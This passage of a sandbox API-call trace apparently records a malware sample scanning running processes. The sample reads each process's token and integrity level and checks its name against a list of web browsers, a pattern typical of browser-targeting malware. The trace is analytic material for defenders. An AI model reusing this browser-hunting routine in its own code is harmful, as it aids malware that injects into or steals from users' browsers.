(lpString1="iexplore.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0241.196] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0241.196] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0241.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0x548 [0241.196] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0241.196] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0241.196] GetLastError () returned 0x7a [0241.196] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0241.196] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0241.196] CloseHandle (hObject=0x340) returned 1 [0241.196] CloseHandle (hObject=0x548) returned 1 [0241.196] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.196] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0241.196] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0241.196] GetLastError () returned 0x7a [0241.196] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0241.196] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0241.196] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0241.196] lstrcmpiW (lpString1="firefox.exe", lpString2="saturday.exe") returned -1 [0241.196] lstrcmpiW (lpString1="chrome.exe", lpString2="saturday.exe") returned -1 [0241.196] lstrcmpiW (lpString1="opera.exe", lpString2="saturday.exe") returned -1 [0241.196] lstrcmpiW (lpString1="iexplore.exe", lpString2="saturday.exe") returned -1 [0241.196] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="saturday.exe") returned -1 [0241.196] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="saturday.exe") returned -1 [0241.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a0) returned 0x0 [0241.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0241.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbe8) returned 0x0 [0241.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6cc) returned 0x0 [0241.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0241.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5fc) returned 0x548 [0241.197] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0241.197] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0241.197] GetLastError () returned 0x7a [0241.197] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0241.197] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0241.197] CloseHandle (hObject=0x340) returned 1 [0241.197] CloseHandle (hObject=0x548) returned 1 [0241.197] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.197] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0241.197] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0241.197] GetLastError () returned 0x7a [0241.197] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0241.197] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0241.197] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0241.197] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0241.197] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0241.197] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0241.197] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0241.197] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0241.197] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0241.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x548 [0241.197] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0241.197] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0241.197] GetLastError () returned 0x7a [0241.197] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0241.197] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0241.197] CloseHandle (hObject=0x340) returned 1 [0241.197] CloseHandle (hObject=0x548) returned 1 [0241.197] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.197] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0241.198] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0241.198] GetLastError () returned 0x7a [0241.198] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0241.198] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0241.198] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0241.198] lstrcmpiW (lpString1="firefox.exe", lpString2="dllhost.exe") returned 1 [0241.198] lstrcmpiW (lpString1="chrome.exe", lpString2="dllhost.exe") returned -1 [0241.198] lstrcmpiW (lpString1="opera.exe", lpString2="dllhost.exe") returned 1 [0241.198] lstrcmpiW (lpString1="iexplore.exe", lpString2="dllhost.exe") returned 1 [0241.198] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dllhost.exe") returned 1 [0241.198] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dllhost.exe") returned 1 [0241.198] VirtualFree (lpAddress=0x340000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.198] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0243.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0xfcfadc | out: SystemInformation=0x0, ResultLength=0xfcfadc*=0xbf10) returned 0xc0000004 [0243.196] VirtualAlloc (lpAddress=0x0, dwSize=0xcf10, flAllocationType=0x1000, flProtect=0x4) returned 0x340000 [0243.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x340000, Length=0xcf10, ResultLength=0x0 | out: SystemInformation=0x340000, ResultLength=0x0) returned 0x0 [0243.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0243.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0243.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0243.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0243.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0243.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0243.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0243.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0243.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0243.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0243.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0243.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0243.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0243.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0243.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0243.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0 [0243.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0243.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0243.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x160) returned 0x0 [0243.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x418) returned 0x0 [0243.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4dc) returned 0x0 [0243.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0x548 [0243.197] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0243.197] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0243.197] GetLastError () returned 0x7a [0243.197] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0243.198] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0243.198] CloseHandle (hObject=0x340) returned 1 [0243.198] CloseHandle (hObject=0x548) returned 1 [0243.198] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.198] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0243.198] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0243.198] GetLastError () returned 0x7a [0243.198] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0243.198] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0243.198] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0243.198] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0243.198] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0243.198] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0243.198] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0243.198] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0243.198] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0243.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0x548 [0243.198] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0243.198] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0243.198] GetLastError () returned 0x7a [0243.198] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0243.198] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0243.199] CloseHandle (hObject=0x340) returned 1 [0243.199] CloseHandle (hObject=0x548) returned 1 [0243.199] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.199] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0243.199] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0243.199] GetLastError () returned 0x7a [0243.199] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0243.199] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0243.199] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0243.199] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0243.199] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0243.199] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0243.199] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0243.199] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0243.199] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0243.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0x548 [0243.199] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0243.199] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0243.199] GetLastError () returned 0x7a [0243.199] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0243.199] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0243.199] CloseHandle (hObject=0x340) returned 1 [0243.199] CloseHandle (hObject=0x548) returned 1 [0243.200] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.200] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0243.200] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0243.200] GetLastError () returned 0x7a [0243.200] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0243.200] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0243.200] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0243.200] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0243.200] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0243.200] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0243.200] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0243.200] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0243.200] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0243.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0243.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d0) returned 0x0 [0243.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x548 [0243.200] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0243.200] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0243.200] GetLastError () returned 0x7a [0243.200] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0243.200] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0243.200] CloseHandle (hObject=0x340) returned 1 [0243.200] CloseHandle (hObject=0x548) returned 1 [0243.200] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.201] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0243.201] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0243.201] GetLastError () returned 0x7a [0243.201] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0243.201] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0243.201] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0243.201] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0243.201] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0243.201] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0243.201] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0243.201] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0243.201] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0243.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x548 [0243.201] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0243.201] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0243.201] GetLastError () returned 0x7a [0243.201] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0243.201] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0243.201] CloseHandle (hObject=0x340) returned 1 [0243.201] CloseHandle (hObject=0x548) returned 1 [0243.201] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0243.201] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0243.201] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0243.201] GetLastError () returned 0x7a [0243.202] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0243.202] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0243.202] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0243.202] lstrcmpiW 